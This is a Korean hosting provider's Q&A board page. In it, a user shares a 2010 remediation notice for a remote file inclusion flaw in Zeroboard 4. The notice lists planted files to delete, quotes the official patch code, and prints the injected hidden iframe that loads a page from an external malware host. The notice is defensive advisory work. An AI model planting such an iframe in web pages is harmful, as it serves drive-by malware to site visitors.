마루웹호스팅 :: 웹호스팅, 도메인 등록, 쇼핑몰 호스팅, 이미지 링크, 서버 호스팅, 코로케이션, 서버관리툴, 리셀러, 홈페이지 제작, 무료호스팅 제공
140-008-011577
 
140-008-011577
입금확인신청 신청현황보기

고객지원센터

1:1 문의하기
  • AM 09:00 ~ PM 06:00
  • AM 11:30 ~ PM 01:00

Q&A 게시판



  2010년 12월 22일 RFI 취약점 보안 패치
  김병윤   2010-12-22 16:29:23 37660 

2010년 12월 22일 RFI 취약점 보안 패치

1. bbs/icon 폴더에 생성된 group_qazwsxedc.jpg, visitLog.php 파일 삭제
2. html, php 파일에 삽입된 iframe 소스 삭제
3. 관리자 페이지를 통해 qazwsxedc 그룹 삭제
4. 제로보드설치폴더/_head.php 파일의 13번째 줄 소스 변경(공식 보안 패치 페이지 참고)
5. 제로보드설치폴더/skin/zero_vote/ask_password.php / error.php / login.php 파일의 2번째 줄 소스 각각 변경(공식 보안 패치 페이지 참고)

※ 제로보드 공식 보안 패치
http://www.xpressengine.com/zb4_security/19346851

제로보드4 pl9 버전에서 RFI (원격파일 인클루드) 취약점이 발견되었습니다.

장경칩님께서 제보해주신 내용입니다.

_head.php 파일과 skin/zero_vote/*.php 파일에 대해 아래 내용으로 코드 수정을 통한 패치를 권드립니다.

_head.php

[수정전]

_head.php
view sourceprint?13.if(eregi(":\/\/",$_zb_path)||eregi("\.\.",$_zb_path)||eregi("^\/",$_zb_path)||eregi("data:;",$_zb_path)) $_zb_path ="./";

[수정후]

_head.php: 문자가 $_zb_path에 포함되지 않도록 수정
view sourceprint?13.if(eregi(":\/\/",$_zb_path)||eregi("\.\.",$_zb_path)||eregi("^\/",$_zb_path)||eregi("data:;",$_zb_path)||eregi(":",$_zb_path)) $_zb_path ="./";


skin/zero_vote/ 디렉토리의 아래에 해당되는 .php 파일

        - ask_password.php

        - error.php

        - login.php

[수정전]

./skin/zero_vote/ask_password.php, error.php, login.php
view sourceprint?2.if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)||eregi("^\/",$dir)||eregi("data:;",$dir)) $dir ="./";

[수정후]

./skin/zero_vote/ask_password.php, error.php, login.php
view sourceprint?2.if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)||eregi("^\/",$dir)||eregi("data:;",$dir)||eregi(":",$dir)) $dir ="./";

--------------------------------------------------------------------------------------------



이번달 중순 경부터 악성 웹변조가 있었습니다.

제 사이트도 물론 당했구요.

증상은 main과 index를 포함한 .html .php 파일 하단에 아래 악성코드가 심어집니다.
<iframe src="http://h.nexprice.com/css/x.htm" width=0 height=0></iframe>

저 같은 경우 config.php lib.php 파일에도 iframe 삽입 되어 있었습니다.

그리고, bbs/icon 폴더에 group_qazwsxedc.jpg, visitLog.php 파일이 생성되구요.

★ data 폴더에는 visitLog.php 파일만 생성되어 있었구요.

또한 최고관리자 로그인 후 그룹별 헤더 인크루드 부분에서 iframe 태그가 삽입이 됨니다.


악성코드가 심어진 사이트 접속하면 무한로딩이나 저질로딩(^^;) 또는 바이러스 감지됨니다.

그전에 패치 해주면 좋겠죠..^^

참고로 제로보드4에만 해당됨니다.




안녕하세요 마루인터넷입니다,

좋은 정보 감사합니다.
2010-12-22
 


15242  1년 연장신청했슴다 행사혜택 하드용량올려주세요  [1]    임대혁 2005/08/10 5578
15241  1년 연장신청했습니다. 행사혜택으로 하드용량 올려주세요  [1]    한규호 2005/08/10 6842
15240  1년 연장하였습니다.  [2]    현승근 2005/08/09 7384
15239  1년연장신청했습니다.  [1] 비밀글입니다   모비넥스 2005/08/09 3
15238  1대 1 게시판에 문의 답변이 없어 여기다 남겨요  [9] 비밀글입니다   허해순 2009/01/16 42
15237  1대일 게시판이 안되서 여기다 남깁니다  [1] 비밀글입니다   제원우 2009/03/02 9
15236  1시쯤 통화해서 십분뒤에 셋팅 된다고 했는데 아직도 안되여...``      이동주 2004/12/13 5576
15235  1월 21일 전화응대 불가 공지입니다.       2005/01/20 6119
15234  1차 도메인...2차는 접속이 됩니다..      이현팔 2004/04/03 6882
15233  1차도메인 연결관련  [2] 비밀글입니다   이광오 2018/12/29 18
15232  1차도메인 연결요청  [3] 비밀글입니다   이광오 2011/06/15 14
15231  1차도메인 연결요청건  [1] 비밀글입니다   강태윤 2012/02/02 6
15230  1차도메인 연결유무 확인요청  [1] 비밀글입니다   이광오 2011/01/03 16
15229  1차도메인 추가 연결요청건  [1] 비밀글입니다   강태윤 2012/02/02 5
15228  2 가지 요청사항..^^ 부탁드립니다.  [1] 비밀글입니다   박주흠 2004/09/21 10
15227  2/23일 입금오류건 환불요청  [1]    김중배 2013/10/25 7021
15226  2005년3월22일 입금했습니다.  [1]    정정운 2005/03/28 5467
15225  2006년 4월 12일 배포될 예정인 IE 설계변경건...  [1]    류성용 2006/04/01 5453
15224  2007년 2월 5일 장애 발생 경위 및 대응과 사과의 말씀       2007/02/06 9010
15223  2008년 1/4분기(01월~03월) 세금계산서 발행 마감 안내.       2008/04/08 5843
15222  2009년 1분기 세금계산서 발행 안내 (4월 10일까지)       2009/04/07 5378
15221  2009년부터 호스팅 사용했는데 어이가 없네요.  [3] 비밀글입니다   권민영 2016/11/23 23
 2010년 12월 22일 RFI 취약점 보안 패치  [1]    김병윤 2010/12/22 37660
15219  2010아웃룩세팅문의요..  [1] 비밀글입니다   권영원 2010/06/21 10
15218  211.49.170.12 (maruge2) 서버 장애 안내 (완료)       2011/12/02 7516
15217  211.49.170.149 리눅스 서버패스워드 초기화요청  [1] 비밀글입니다   정선웅 2015/03/10 36

 [1][2][3][4][5][6] 7 [8][9][10]..[593]